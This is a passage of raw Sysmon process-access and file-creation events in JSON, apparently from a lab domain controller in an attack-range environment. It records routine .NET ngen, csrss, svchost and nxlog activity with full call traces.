(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8772,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:52.545\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1373-5F25-0000-0010ECF40E00}\r\nTargetProcessId: 628\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:52.545","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1373-5F25-0000-0010ECF40E00}","TargetProcessId":"628","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8773,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:52.545\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1373-5F25-0000-0010ECF40E00}\r\nTargetProcessId: 628\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:52.545","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1373-5F25-0000-0010ECF40E00}","TargetProcessId":"628","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8774,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:52.560\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-139C-5F25-0000-0010878A1000}\r\nTargetProcessId: 628\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:52.560","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-139C-5F25-0000-0010878A1000}","TargetProcessId":"628","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8775,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:53.560\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:53.560","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8776,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:54.498\r\nProcessGuid: {E2A3D6B1-139C-5F25-0000-0010878A1000}\r\nProcessId: 628\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\274-0\\System.Workflow.Activities.dll\r\nCreationUtcTime: 2020-08-01 07:02:54.498","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:54.498","ProcessGuid":"{E2A3D6B1-139C-5F25-0000-0010878A1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\274-0\\System.Workflow.Activities.dll","CreationUtcTime":"2020-08-01 07:02:54.498","EventReceivedTime":"2020-08-01 07:02:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8777,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:54.560\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-139E-5F25-0000-00103D901000}\r\nTargetProcessId: 4872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:54.560","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-139E-5F25-0000-00103D901000}","TargetProcessId":"4872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8778,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:54.560\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-139E-5F25-0000-00103D901000}\r\nTargetProcessId: 4872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:54.560","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-139E-5F25-0000-00103D901000}","TargetProcessId":"4872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8779,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:54.576\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:54.576","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
